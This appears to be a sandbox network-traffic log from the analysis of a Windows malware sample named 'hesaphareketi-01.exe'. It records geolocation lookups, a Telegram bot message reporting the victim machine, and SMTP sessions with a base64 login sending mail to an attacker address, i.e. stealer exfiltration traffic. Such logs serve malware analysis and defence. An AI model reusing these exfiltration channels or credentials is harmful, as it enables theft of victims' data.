2024-10-03 07:11:22 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:11:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49710	188.114.96.3	443	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:11:23 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-03 07:11:23 UTC	686	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63277 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WlQxDcqt%2Fx1HgoG8ctMuwq3L%2FIL1r%2FqYzvocfYDDxl%2FlzwYibNhR%2FPHRO7UVzZMtBNoa961ht7jKBLt4rs5I%2F3u2OXepzntvus2m4GZ%2Fj%2B4Bk9WLJiHAApSrvris6hQo310XvPDF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb1e2a2eab4363-EWR
2024-10-03 07:11:23 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:11:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49714	188.114.96.3	443	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:11:24 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:11:24 UTC	674	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63278 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zh5e8Xb3dl9JghVhUxoveOKw0loshxfP4%2FYBaaXJbZpXDKssKXYPF8KWbXar8rSEmzTWOqwkFAS56c5%2Fo0CRcHPEnXo9Asf9GNuO7XTMD5OuQ3MAXeL6ifLkprTwnKTIrTS8UNX5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb1e331fe442d4-EWR
2024-10-03 07:11:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:11:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49716	188.114.96.3	443	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:11:27 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-03 07:11:27 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63281 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s8P9UTNQNhSggL6FZqXcVFfmDH%2B50TzY7g78h1YDblyy5qX%2BJPOZ8js%2BYTxVqq9LA9EQTW1JkanN93Yztfs6xkp8nTxL4DcjlS4VzNuOjoESEL5m1i4%2ByKf%2F8WyznJJuIri9rmVG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb1e4359841a40-EWR
2024-10-03 07:11:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:11:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49718	188.114.96.3	443	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:11:28 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:11:28 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63282 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3XTIqFjqEjyFZ5GbkJIEpMlh6QbbPhXtTQnuG5ZRTrlyOTYnM%2BLrqR26eyEpMo0sGE0ebUo03xHVJrJthyV%2Fj2ft2rDcZdhvOz24kU%2FsEoqPVblI1Sw22zAAjz5iIfkflFv1wDyw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb1e4b1f99426b-EWR
2024-10-03 07:11:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:11:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49720	188.114.96.3	443	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:11:30 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:11:30 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63284 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPPgH%2Fn89u5Z4E18lmowVVGSe4ntQM%2B70WhaHnAUcm9zmnG0QBWj8gywdtnR5KM17p%2BnXFTjzxKFP541Cx%2BboPN48rCS0zki7iST6%2BB6j7mQN%2FVF6A3MUrdxMI6ktYUPDxKnBwlr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb1e567a2115cb-EWR
2024-10-03 07:11:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:11:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49722	188.114.96.3	443	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:11:31 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:11:31 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63285 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GaC8N56xHYZx3rJBE6N%2B1ZKf2xACyvakDg%2F5bezwfxcTcFsWMV89pJbayfcZeIGnAG1s9%2Bk3FgBs0mRcd%2Be2j6kR5Dh%2Blh1EfksyLDT6cS2IwuAlVvQgxwgWH1OLXu%2Be4GnwDLAH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb1e5e4d5f43fa-EWR
2024-10-03 07:11:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:11:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49728	188.114.96.3	443	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:11:33 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-03 07:11:33 UTC	700	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63287 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LynhOPX9Sodb1ek5QOKsSpQhHBvvexe3qTCC1wggj1KZZdKXMKRJLreTvx3QBTidf7unLF1RclSZTQgRTs1cmN8fJNpTFPZ2Ey6nEzKNT8jeYY4109QigXSYeAS9yMmiDQUnc5vJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb1e6a6a94c42c-EWR alt-svc: h3=":443"; ma=86400
2024-10-03 07:11:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:11:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49731	188.114.96.3	443	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:11:35 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:11:36 UTC	674	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:11:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63289 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=afhJgd57t2CNFjg3ADkZ5J5p4qG59q%2B6esLVNNo38otAIja2hMKOAWKRqyTjnj1WWone5CCAU3YzBCOpeEX2uuOFp9AfxbCzd8G9NJRc8nVOQKEcqfjwTtWB481595yihiZplQM%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb1e79ac501881-EWR
2024-10-03 07:11:36 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:11:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49732	149.154.167.220	443	5508	C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:11:36 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20and%20Time:%2003/10/2024%20/%2019:12:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20581804%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-03 07:11:36 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:11:36 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-03 07:11:36 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 3, 2024 09:11:44.422297955 CEST	587	49733	77.245.159.27	192.168.2.9	220 Win Webb - SMTP
Oct 3, 2024 09:11:44.422511101 CEST	49733	587	192.168.2.9	77.245.159.27	EHLO 581804
Oct 3, 2024 09:11:44.651324987 CEST	587	49733	77.245.159.27	192.168.2.9	250-win-webb.wlsrv.com [8.46.123.33], this server offers 5 extensions 250-AUTH LOGIN 250-SIZE 26214400 250-HELP 250-AUTH=LOGIN 250 STARTTLS
Oct 3, 2024 09:11:44.652264118 CEST	49733	587	192.168.2.9	77.245.159.27	AUTH login c2F0aXNAb2JhYW1iYWxhai5jb20udHI=
Oct 3, 2024 09:11:44.883759022 CEST	587	49733	77.245.159.27	192.168.2.9	334 UGFzc3dvcmQ6
Oct 3, 2024 09:11:45.112962008 CEST	587	49733	77.245.159.27	192.168.2.9	235 Authenticated
Oct 3, 2024 09:11:45.113364935 CEST	49733	587	192.168.2.9	77.245.159.27	MAIL FROM:<satis@obaambalaj.com.tr>
Oct 3, 2024 09:11:45.481303930 CEST	587	49733	77.245.159.27	192.168.2.9	250 Requested mail action okay, completed
Oct 3, 2024 09:11:45.481457949 CEST	49733	587	192.168.2.9	77.245.159.27	RCPT TO:<dnlchns@gmail.com>
Oct 3, 2024 09:11:45.713601112 CEST	587	49733	77.245.159.27	192.168.2.9	250 Requested mail action okay, completed
Oct 3, 2024 09:11:45.713757992 CEST	49733	587	192.168.2.9	77.245.159.27	DATA
Oct 3, 2024 09:11:46.141494036 CEST	587	49733	77.245.159.27	192.168.2.9	354 Start mail input; end with <CRLF>.<CRLF>
Oct 3, 2024 09:11:46.142446041 CEST	49733	587	192.168.2.9	77.245.159.27	.
Oct 3, 2024 09:11:46.561744928 CEST	587	49733	77.245.159.27	192.168.2.9	250 Requested mail action okay, completed
Oct 3, 2024 09:11:48.074827909 CEST	49733	587	192.168.2.9	77.245.159.27	QUIT
Oct 3, 2024 09:11:48.303304911 CEST	587	49733	77.245.159.27	192.168.2.9	221 Service closing transmission channel
Oct 3, 2024 09:11:49.818443060 CEST	587	49734	77.245.159.27	192.168.2.9	220 Win Webb - SMTP
Oct 3, 2024 09:11:49.818744898 CEST	49734	587	192.168.2.9	77.245.159.27	EHLO 581804
Oct 3, 2024 09:11:49.819036961 CEST	587	49734	77.245.159.27	192.168.2.9	220 Win Webb - SMTP
Oct 3, 2024 09:11:49.819428921 CEST	587	49734	77.245.159.27	192.168.2.9	220 Win Webb - SMTP
Oct 3, 2024 09:11:49.822271109 CEST	587	49734	77.245.159.27	192.168.2.9	220 Win Webb - SMTP
Oct 3, 2024 09:11:50.049725056 CEST	587	49734	77.245.159.27	192.168.2.9	250-win-webb.wlsrv.com [8.46.123.33], this server offers 5 extensions 250-AUTH LOGIN 250-SIZE 26214400 250-HELP 250-AUTH=LOGIN 250 STARTTLS
Oct 3, 2024 09:11:50.049994946 CEST	49734	587	192.168.2.9	77.245.159.27	AUTH login c2F0aXNAb2JhYW1iYWxhai5jb20udHI=
Oct 3, 2024 09:11:50.281033993 CEST	587	49734	77.245.159.27	192.168.2.9	334 UGFzc3dvcmQ6
Oct 3, 2024 09:11:50.610210896 CEST	587	49734	77.245.159.27	192.168.2.9	235 Authenticated
Oct 3, 2024 09:11:50.610495090 CEST	49734	587	192.168.2.9	77.245.159.27	MAIL FROM:<satis@obaambalaj.com.tr>
Oct 3, 2024 09:11:50.844310999 CEST	587	49734	77.245.159.27	192.168.2.9	250 Requested mail action okay, completed
Oct 3, 2024 09:11:50.844556093 CEST	49734	587	192.168.2.9	77.245.159.27	RCPT TO:<dnlchns@gmail.com>
Oct 3, 2024 09:11:51.082515955 CEST	587	49734	77.245.159.27	192.168.2.9	250 Requested mail action okay, completed
Oct 3, 2024 09:11:51.082670927 CEST	49734	587	192.168.2.9	77.245.159.27	DATA
